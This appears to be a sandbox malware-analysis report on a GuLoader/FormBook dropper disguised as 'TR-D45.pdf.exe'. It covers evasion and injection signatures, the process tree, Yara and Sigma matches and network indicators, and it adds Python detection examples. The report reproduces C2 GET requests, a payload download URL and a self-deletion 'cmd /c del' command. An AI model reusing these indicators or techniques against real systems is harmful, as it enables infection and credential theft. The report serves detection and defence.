
Analysis Report TR-D45.pdf.exe

Overview

General Information

Sample Name: TR-D45.pdf.exe
Analysis ID: 321007
MD5: 937841064411662c36469498ea645660
SHA1: 7e72225620b06b6d9f5d54ee45ca2dd7ba10e87e
SHA256: 3b162f2943b2ee8d6075b2f8f4cbd7832e11b50ecdfcb4a68cf18eb1c7614651
Tags: exe, GuLoader

Detection

Detected: FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • TR-D45.pdf.exe (PID: 6060 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
    • TR-D45.pdf.exe (PID: 3668 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6676 cmdline: /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x183e9:$sqlite3step: 68 34 1C 7B E1
  • 0x184fc:$sqlite3step: 68 34 1C 7B E1
  • 0x18418:$sqlite3text: 68 38 2A 90 C5
  • 0x1853d:$sqlite3text: 68 38 2A 90 C5
  • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18553:$sqlite3blob: 68 53 D8 7F 8C

Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x47b4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security
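The two Formbook rules above match on fixed byte sequences, and the JPCERT/CC rule keys on three five-byte strings that each begin with 0x68, the x86 opcode for push imm32. The following is an added example, not part of the Joe Sandbox report and not yara-project code: it compiles the hex strings listed above into byte regexes, scans a buffer the way a Yara string match does, evaluates an illustrative "N of them" condition (the real rules' conditions are not shown on this page), and decodes the pushed immediates. The buffer is constructed, NOP filler with the strings placed at chosen offsets, so the expected offsets are known.

```python
"""Byte-sequence scan of a memory buffer, the way the Yara strings of the
Formbook rules above are matched, plus decoding of the 'push imm32' constants
the JPCERT/CC rule keys on. Added example for this report; not Joe Sandbox or
yara-project code. The hex strings are copied from the rule matches above;
the buffer is constructed (0x90 filler with the strings at known offsets);
the 'N of them' threshold is illustrative, not the rules' actual conditions.
"""
import re
import struct
from typing import Dict, List

FORMBOOK_SEQUENCES = {  # from the yara-signator Formbook_1 matches above
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
}
JPCERT_PUSHES = {  # from the JPCERT/CC Formbook matches above; 68 = push imm32
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def compile_hex(pattern: str) -> "re.Pattern[bytes]":
    """Turn a Yara-style hex string ('??' = any one byte) into a bytes regex."""
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16) for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf: bytes, strings: Dict[str, str]) -> Dict[str, List[int]]:
    """Return {string name: [offsets]} for every string that occurs in buf."""
    hits: Dict[str, List[int]] = {}
    for name, pattern in strings.items():
        offsets = [m.start() for m in compile_hex(pattern).finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def rule_matches(hits: Dict[str, List[int]], threshold: int) -> bool:
    """Yara-style '<threshold> of them' condition over distinct strings."""
    return len(hits) >= threshold


def push_immediates(buf: bytes, hits: Dict[str, List[int]]) -> Dict[str, List[int]]:
    """Decode the 32-bit little-endian immediate following each 0x68 hit."""
    out: Dict[str, List[int]] = {}
    for name, offsets in hits.items():
        for off in offsets:
            if buf[off] == 0x68:
                out.setdefault(name, []).append(struct.unpack_from("<I", buf, off + 1)[0])
    return out


def build_sample() -> bytes:
    """Constructed 1 KiB buffer: 0x90 filler with rule strings at fixed offsets."""
    layout = {
        0x100: FORMBOOK_SEQUENCES["sequence_0"],
        0x180: FORMBOOK_SEQUENCES["sequence_0"],   # two sites, as in the report
        0x200: FORMBOOK_SEQUENCES["sequence_2"],
        0x300: JPCERT_PUSHES["sqlite3step"],
        0x320: JPCERT_PUSHES["sqlite3text"],
        0x340: JPCERT_PUSHES["sqlite3blob"],
    }
    buf = bytearray(b"\x90" * 0x400)
    for off, hexstr in layout.items():
        data = bytes.fromhex(hexstr)
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    seq_hits = scan(sample, FORMBOOK_SEQUENCES)
    print("Formbook_1 strings:", {k: [hex(o) for o in v] for k, v in seq_hits.items()})
    print("2 of them:", rule_matches(seq_hits, 2))
    push_hits = scan(sample, JPCERT_PUSHES)
    print("push imm32:", {k: [hex(v) for v in vs] for k, vs in push_immediates(sample, push_hits).items()})
```

Running it on a real dump (for example the .sdmp files referenced above, read as bytes) replaces build_sample(); the offsets printed then correspond to the 0x...:$sequence_N offsets the report shows.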

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started
Author: Florian Roth (rule), @blu3_team (idea)
Data:
  • Command: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
  • CommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
  • CommandLine|base64offset|contains:
  • Image: C:\Users\user\Desktop\TR-D45.pdf.exe
  • NewProcessName: C:\Users\user\Desktop\TR-D45.pdf.exe
  • OriginalFileName: C:\Users\user\Desktop\TR-D45.pdf.exe
  • ParentCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
  • ParentImage: C:\Users\user\Desktop\TR-D45.pdf.exe
  • ParentProcessId: 6060
  • ProcessCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe'
  • ProcessId: 3668
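The Sigma hit above fires on the process-creation event alone: the image name ends in .pdf.exe. The Startup tree adds a second, behavioural indicator that a process-creation feed can also carry: a cmd.exe launched from control.exe, itself under explorer.exe, runs "/c del" against the original sample path. The following is an added example, not part of the Joe Sandbox report and not Sigma or Joe Security code: it applies both checks to constructed Sysmon-style events built from the Startup tree above (parent links follow the tree as the sandbox drew it, with explorer.exe shown under the injecting sample). The double-extension check generalises the Sigma idea to a list of decoy and executable extensions and tolerates space padding between them; the self-deletion check walks the parent chain and flags a deletion whose target is an ancestor's image path.

```python
"""Process-creation triage over Sysmon-style events: a Sigma-like
'Suspicious Double Extension' check and a check for a cmd.exe that deletes
the image of one of its own ancestors (the '/c del' step in the report's
process tree). Added example for this report; not Joe Sandbox, Sigma or
Joe Security code. SAMPLE_EVENTS is constructed from the Startup tree above;
parent PIDs follow the tree as the sandbox drew it.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Decoy (document-like) extension followed by an executable one, with
# optional space padding in between, e.g. "invoice.pdf      .exe".
DECOY_EXT = ("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt", "jpg", "png")
EXEC_EXT = ("exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs")
DOUBLE_EXT = re.compile(
    r"\.(?:" + "|".join(DECOY_EXT) + r")\s*\.(?:" + "|".join(EXEC_EXT) + r")$",
    re.IGNORECASE,
)
# 'del' in a cmd.exe command line, with optional switches and optional quoting
# (Joe Sandbox prints double quotes as single quotes).
DEL_RE = re.compile(
    r"(?:^|[\s&])del\s+(?:/[a-z]+\s+)*['\"]?(?P<path>[^'\"&]+?)['\"]?\s*(?:$|&)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def is_double_extension(image: str) -> bool:
    """True when the file name ends in <decoy>.<executable>."""
    return DOUBLE_EXT.search(image.rsplit("\\", 1)[-1]) is not None


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Iterator[ProcEvent]:
    """Walk parent links; the seen-set guards against PID-reuse loops."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def triage(events: List[ProcEvent]) -> List[Tuple]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Tuple] = []
    for e in events:
        if is_double_extension(e.image):
            alerts.append(("suspicious_double_extension", e.pid, e.image))
        if e.image.lower().endswith("\\cmd.exe"):
            m = DEL_RE.search(e.cmdline)
            if m:
                target = m.group("path").strip().lower()
                for anc in ancestors(e, by_pid):
                    if anc.image.lower() == target:
                        alerts.append(("self_deletion_of_ancestor_image", e.pid, anc.pid))
                        break
    return alerts


SAMPLE = r"C:\Users\user\Desktop\TR-D45.pdf.exe"
SAMPLE_EVENTS = [  # constructed from the report's Startup tree
    ProcEvent(6060, 0, SAMPLE, "'%s'" % SAMPLE),
    ProcEvent(3668, 6060, SAMPLE, "'%s'" % SAMPLE),
    ProcEvent(3472, 3668, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6660, 3472, r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\control.exe"),
    ProcEvent(6676, 6660, r"C:\Windows\SysWOW64\cmd.exe", "/c del '%s'" % SAMPLE),
    ProcEvent(6692, 6676, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # benign controls, constructed: a PDF reader and a temp-file cleanup
    ProcEvent(7000, 1000, r"C:\Program Files\Adobe\AcroRd32.exe", r"AcroRd32.exe C:\Users\user\report.pdf"),
    ProcEvent(7001, 7000, r"C:\Windows\System32\cmd.exe", r"/c del C:\Users\user\AppData\Local\Temp\tmp1.txt"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Both checks are static on the event stream and need no file access, which is why they fit a SIEM rule. The self-deletion check only names an alert when the deleted path equals an ancestor's image, so routine "cmd /c del" of temp files, as in the control event, stays quiet.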

      Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: TR-D45.pdf.exe, Virustotal: Detection: 29%
Source: TR-D45.pdf.exe, ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match, File source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TR-D45.pdf.exe, Code function: 4x nop then pop ebx, 1_2_000A7AFD
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx, 12_2_02447AFD
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 12_2_02456BD4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
Source: global traffic, HTTP traffic detected: GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1 | Host: www.gcvinternational.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic, HTTP traffic detected: GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1 | Host: www.celebrations.sucks | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS traffic detected: queries for: pilatescollective.com
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.G
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://cps.letsencrypt.org0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: control.exe, 0000000C.00000002.497562201.0000000004E2F000.00000004.00000001.sdmp, String found in binary or memory: http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp, String found in binary or memory: https://pilatescollective.com/
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp, String found in binary or memory: https://pilatescollective.com/D4
Source: TR-D45.pdf.exe, String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin
Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp, String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin/
Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp, String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin7
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp, String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin=WyM
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp, String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.binl
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 443
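The two GET requests above carry only Host and Connection headers, a seven-NUL-byte body on a GET, and the same bly=TVIpcz004Rkd parameter to two different hosts, which is what the "HTTP GET or POST without a user agent" signature in the list describes. The following is an added example, not part of the Joe Sandbox report: it parses raw HTTP requests, raises those three traits as flags, and reports query values reused across hosts. The C2 requests are reconstructed from the "HTTP traffic detected" lines (CRLF line endings assumed; the body is the seven bytes of the Data Raw field); the browser request is a constructed control; the flag names are this example's own.

```python
"""Parse raw HTTP requests and flag the traits the report's network evidence
shows: a GET or POST with no User-Agent header, a GET that carries a body,
and one query value reused across hosts. Added example for this report; not
Joe Sandbox code. C2_REQUESTS are reconstructed from the two 'HTTP traffic
detected' lines above (CRLF assumed; body = the seven NUL bytes of 'Data
Raw'); BROWSER_REQUEST is a constructed control.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit


def parse_request(raw: bytes) -> dict:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Keep query values verbatim: these are C2 tokens, not form data, so no
    # '+' or percent decoding (which parse_qsl would apply).
    query: Dict[str, str] = {}
    for kv in parts.query.split("&"):
        if kv:
            k, _, v = kv.partition("=")
            query[k] = v
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "host": headers.get("host", ""), "body": body}


def flags(req: dict) -> List[str]:
    out = []
    if req["method"] in ("GET", "POST") and "user-agent" not in req["headers"]:
        out.append("no_user_agent")
    if req["method"] == "GET" and req["body"]:
        out.append("get_with_body")
    if req["headers"].get("connection", "").lower() == "close" and "accept" not in req["headers"]:
        out.append("minimal_header_set")
    return out


def shared_query_values(reqs: List[dict]) -> Dict[Tuple[str, str], Set[str]]:
    """(param, value) pairs that the client sent to two or more hosts."""
    seen: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for r in reqs:
        for k, v in r["query"].items():
            seen[(k, v)].add(r["host"])
    return {kv: hosts for kv, hosts in seen.items() if len(hosts) > 1}


def analyze(raws: List[bytes]):
    reqs = [parse_request(r) for r in raws]
    rows = [{"host": r["host"], "path": r["path"], "params": sorted(r["query"]),
             "flags": flags(r)} for r in reqs]
    return rows, shared_query_values(reqs)


C2_REQUESTS = [  # reconstructed from the report's two GET requests
    b"GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1\r\n"
    b"Host: www.gcvinternational.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1\r\n"
    b"Host: www.celebrations.sucks\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
]
BROWSER_REQUEST = (  # constructed control
    b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (constructed)\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    rows, shared = analyze(C2_REQUESTS + [BROWSER_REQUEST])
    for row in rows:
        print(row)
    print("reused across hosts:", shared)
```

The cross-host reuse check is the one worth keeping in a proxy-log job: a single token value showing up in requests to unrelated domains is not something a browser does, and it survives the domain rotation that the two hosts above illustrate.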

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, the same five memory-dump file sources listed under AV Detection above, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: TR-D45.pdf.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TR-D45.pdf.exe, code functions in process 0_2 (addresses listed without the 0_2_ prefix):
  • NtProtectVirtualMemory: 02399264
  • EnumWindows, NtSetInformationThread: 0239071B
  • NtSetInformationThread, TerminateProcess: 02390A92
  • NtSetInformationThread, LoadLibraryA: 023989D5
  • NtSetInformationThread: 0239877D, 023907E7, 023917D1, 02398486, 023915D6, 02391AAA, 02397BBE, 0239087B, 023908C7, 0239092B, 023919D3, 02391E85, 02392F0A, 02397FCC
  • NtResumeThread: 02399799, 023997D7, 02399A23, 02399A57, 02399A87, 02399B17, 02399B53, 02399B8F, 02399BD7, 02399837, 02399807, 0239989F, 023998F7, 023998CB, 02399933, 023999BB, 023999F7, 02399E07, 02399C1F, 02399C57, 02399CB7, 02399D1F, 02399D5F, 02399DD3
  • NtWriteVirtualMemory: 02393721, 0239371B, 02393787, 023937DC, 023937D3, 02393A2B, 02393A7F, 02393AE3, 02393B43, 02393B97, 02393BDE, 02393823, 0239387B, 0239397F, 02393985, 023939D7, 02393C43, 02393CC3, 02393D1F, 02393D8B, 02393DCB
Source: C:\Users\user\Desktop\TR-D45.pdf.exe, code functions in process 1_2:
  • 1_2_1E2A9660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 1_2_1E2A96E0 NtFreeVirtualMemory, LdrInitializeThunk
